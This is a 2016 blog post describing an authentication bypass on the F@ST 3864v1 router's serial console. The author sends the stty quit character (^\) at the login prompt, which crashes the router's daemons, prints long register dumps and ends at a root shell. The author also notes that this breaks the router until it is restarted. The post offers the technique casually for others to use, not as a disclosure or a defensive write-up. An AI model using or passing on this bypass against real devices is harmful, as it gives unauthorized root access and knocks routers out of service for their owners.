Wednesday, 1 June 2016

F@ST 3864v1: serial prompt authentication exploit.


 F@ST 3864v1:
 serial prompt authentication exploit.


ok guys this ones a really quick one, ive got alot to come but this is urgent :P


during my usual diggings i was left sitting at the caret waiting on a login to begin..

Login: /////////////////////////////////////////////////////////////////////////
Password:                                                                      
Login incorrect. Try again.                                               

next i thought just a web null what could be the worst that happens:
Login:                                                                    
Password:                                                                      
Login incorrect. Try again.

next was:

Login: %^]���^B����؀=y4���^B���^\

just as a random ammount of unicode chars

and then i learnt

that i could simply use
Login: ^\ (this ones the stty quit command)

wlmngr/669: potentially unexpected fatal sign .
smd/340: potentially unexpected fatal signal 3.
 Cpu 0                                                                         
$ 0   : 00000000 10008d00 00000202 00000012                                   
$ 4   : 00000012 7fee1710 00000000 00000001                                   
$ 8   : 00000000 7fee15ec 00000000 77fe9434                                   
$12   : 00009326 7fee15e4 00000000 00000000                                   
$16   : 7fee1964 00000001 00401e2c 00000000                                   
$20   : 00000000 00000000 00000000 00407b48                                   
$24   : 00000000 2adaef90                                                     
$28   : 2adfc3e0 7fee1668 7fee1698 00404884                                   
Hi    : 00c34ea5                                                              
Lo    : 1f6336bc                                                              
epc   : 2adaefcc 0x2adaefcc                                                   
    Tainted: P                                                                
ra    : 00404884 0x404884                                                     
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
�consoled/976: potentially unexpected fatal signal 3.                         
swmdk/776: potentially unexpected fatal signal 3.                             
swmdk/727: potentially unexpected fatal signal 3.                             
dsldiagd/726: potentially unexpected fatal signal 3.                          
dhcpd/357: potentially unexpected fatal signal 3.                             
�                                                                             
                                                                              
Cpu 0                                                                         
$ 0   : 00000000                                                              
Cpu 1                                                                         
$ 0   : 00000000 00000001 00000200 00000000                                   
$ 4   : 00000003 0041951c 0000001c 00000001                                   
$ 8   : 02000000 626c6564 4f4d5f43 4f4d5f47                                   
$12   : 75657374 49736f6c 61746543 6c69656e                                   
$16   : 0041951c 00000003 00400e34 00000000                                   
$20   : 00000000 00000000 00000000 00407b48                                   
$24   : 00000001 2af12980                                                     
$28   : 2af603e0 7ff7e328 7ff7e380 2af0e940                                   
Hi    : 00000001                                                              
Lo    : 00000000                                                              
epc   : 2af129a4 0x2af129a4                                                   
    Tainted: P                                                                
ra    : 2af0e940 0x2af0e940                                                   
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
 00000001 00000202 0041ed80                                                   
$ 4   : 00000005 7fa5167c 00000000 00000001                                   
$ 8   : 00000030 00000000 00000001 00000057                                   
$12   : 00000807 00000800 00000400 00000008                                   
$16   : 0041ec68                                                              
Cpu 1                                                                         
$ 0   : 00000000 7fd4d1c6 00000202 00000001                                   
$ 4   : 00000001 7fd4d18c 00000000 00000001                                   
$ 8   : 03994c69 00000001 0000005b 00000000                                   
$12   : 00000001 2ac456f3 2ab4bafb 2ac4171c                                   
$16   : 7fd4d5d4 00000003 00400fc4 00000000                                   
$20   : 00000000 00000000 00000000 00407b48                                   
$24   : 2ac3b96c 2aea4f90                                                     
$28   : 2aef23e0 7fd4d0f8 7fd4d128 2ab5069c                                   
Hi    : 0000031b                                                              
Lo    : 0000e4c2                                                              
epc   : 2aea4fcc 0x2aea4fcc                                                   
    Tainted: P                                                                
ra    : 2ab5069c 0x2ab5069c                                                   
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
 0000a8dd                                                                     
Cpu 1                                                                         
$ 0   : 00000000 7ffcf074 00000202 7ffcfdbc                                   
$ 4   : 00000006 7ffcfdbc 00000000 00000001                                   
$ 8   : 00000000 00000000 00000000 00000000                                   
$12   : 00000000 00000000 00000000 00000000                                   
$16   : 7ffd0024 00000001 00401000 00000000                                   
$20   : 00000000 00000000 00000000 00407b48                                   
$24   : 00000000 2abb7f90                                                     
$28   : 2ac053e0 7ffcfc98 7ffcfcc8 004012d8                                   
Hi    : 00000000                                                              
Lo    : 00000000                                                              
epc   : 2abb7fcc 0x2abb7fcc                                                   
    Tainted: P                                                                
ra    : 004012d8 0x4012d8                                                     
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
 0041ec68                                                                     
Cpu 1                                                                         
$ 0   : 00000000 10008d00 00000202 80000000                                   
$ 4   : 7fab3ac0 00000010 7fab3ac0 00000001                                   
$ 8   : 00000000 00000000 00000000 00000415                                   
$12   : 00000415 87b87c00 00000002 2af8a288                                   
$16   : 7fab3ac0 2aafd454 2aafd480 00000000                                   
$20   : 2aae17d0 00000000 00000000 00407b48                                   
$24   : 2af86868 2af97760                                                     
$28   : 2afe43e0 7fab3a88 7fab3c28 2aae7238                                   
Hi    : 00000018                                                              
Lo    : 00038c23                                                              
epc   : 2af97788 0x2af97788                                                   
    Tainted: P                                                                
ra    : 2aae7238 0x2aae7238                                                   
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
Cpu 1                                                                         
$ 0   : 00000000 10008d00 00000000 00000000                                   
$ 4   : 7f3ffaf8 7f3ffaf8 00000000 00000000                                   
$ 8   : 00000000 00008d00 00000000 87848000                                   
$12   : 000092bc 811018e0 00000000 00000000                                   
$16   : 7f3ffaf8 7f3ffaf8 00000002 00000000                                   
$20   : 7f3ffb80 2aafd480 7f201000 00000004                                   
$24   : 00000000 2af966c0                                                     
$28   : 2afe43e0 7f3ffa90 7f3ffca8 2aae6b50                                   
Hi    : 00000000                                                              
Lo    : 3b9aca00                                                              
epc   : 2af966e4 0x2af966e4                                                   
    Tainted: P                                                                
ra    : 2aae6b50 0x2aae6b50                                                   
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
 00000001                                                                     
$20   : 7fa51d14 0040bf84 0040bff0 0040bfa4                                   
$24   : 00000001 2ab57f90                                                     
$28   : 2aba53e0 7fa515e8 7fa51618 00402488                                   
Hi    : 00000000                                                              
Lo    : 0002b4e0                                                              
epc   : 2ab57fcc 0x2ab57fcc                                                   
swmdk/777: potentially unexpected fatal signal 3.                             
                                                                              
Cpu 1                                                                         
$ 0   : 00000000 00000001 00000204 00000000                                   
$ 4   : 7f1ffaf8 7f1ffaf8 00000000 00000001                                   
$ 8   : 00000000 80000008 80095310 fffffff0                                   
$12   : 7f1ffb00 00000000 7f3ffab8 00000000                                   
$16   : 7f1ffaf8 7f1ffaf8 00000003 00000000                                   
$20   : 7f1ffb80 2aafd480 7f001000 00000004                                   
$24   : 00000000 2af966c0                                                     
$28   : 2afe43e0 7f1ffa90 7f1ffca8 2aae6b50                                   
Hi    : 08e5afb8                                                              
Lo    : 22b60d87                                                              
epc   : 2af966e4 0x2af966e4                                                   
    Tainted: P                                                                
ra    : 2aae6b50 0x2aae6b50                                                   
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
    Tainted: P                                                                
ra    : 00402488 0x402488                                                     
Status: 00008d13    USER EXL IE                                               
Cause : 00000020                                                              
PrId  : 0002a080 (Broadcom4350)                                               
ssk:error:704.805:ssk_main:435:detected exit of smd, ssk will also exit       
Quit                                                                          
dnsproxy:error:704.807:processCmsMsg:1258:lost connection to smd, exiting now.
tr69c:error:704.808:readMessageFromSmd:1555:lost connection to smd, exiting now.


 And we have shell
#

although we have broken the router and it will now require a restart

enjoy and ill be back really soon with a few more surprises

\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
STTY commands:

intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>;          
                                                                               
eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; 
                                                                               
werase = ^W; lnext = ^V; flush = ^O; min = 1; time = 0;                        
                                                                               
-brkint ixoff -imaxbel                                                         
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\                     

No comments:

Post a Comment